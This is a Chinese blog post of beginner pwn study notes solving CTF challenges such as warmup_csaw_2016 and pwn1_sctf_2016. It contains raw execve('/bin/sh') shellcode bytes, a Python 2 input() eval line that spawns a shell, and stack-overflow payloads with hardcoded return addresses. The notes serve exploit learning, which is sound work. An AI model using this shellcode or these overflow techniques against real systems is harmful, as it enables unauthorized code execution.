Pwn学习笔记

寄存器

EAX
EBX
ECX
EDX
EDI
ESI
EBP指向系统栈最上面一个栈帧的底部。
ESP保存当前 Stack 的地址

在这里插入图片描述

汇编指令

指令平台作用
ucomissx86浮点比较
ParagraphTextAnd more

shallcode

char * input = (char *) malloc(sizeof(char)*256);
read(0, input, 256);
((void (*)())(input))();

把字符串当函数执行,直接跑shallcode脚本,然后手动cat flag

payload = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

python2 input
    while True:
        input(">")

python2的input() 能自动识别出输入的类型,将输入内容转换为对应类型(str、int、float)

输入3+2返回就是5

写脚本 import(‘os’).system(‘/bin/sh’)

然后cat flag

gets返回覆盖

warmup_csaw_2016

脚本如下gets中的录入长度+ebp大小(64位是8)+p64(被调函数地址)

payload = b’a’ * (0x40 + 8) + p64(0x400611)

在这里插入图片描述

gets任意写

ciscn_2019_n_1

在这里插入图片描述

v2开始位置是rbp-4h

v1开始位置是rbp-30h

需要覆盖0x30-0x4=44

在这里插入图片描述

发现func函数的浮点比较命令,跳转dword_4007F4,可以拿到11.28125对应的十六进制41348000h

payload = b"A" * 44 + p64(0x41348000)

printf溢出读

pwn1_sctf_2016

在这里插入图片描述

s大小位3C即60

而fgets限制输入32

发现18行有一个替换操作,猜想"I"被替代为了"You"

nc连接发现确实是这样

那可以构建

payload = b"I" * 20 + b’a’ * 4 + p64(0x8048F0D)

read任意读

StackOverFlow

在这里插入图片描述

没啥说的,注意一下32位程序,ebp是4

payload = b"a" * (72 + 4) + p32(0x8048EE0)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

有头发的琦玉

打点钱,我会再努力的

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值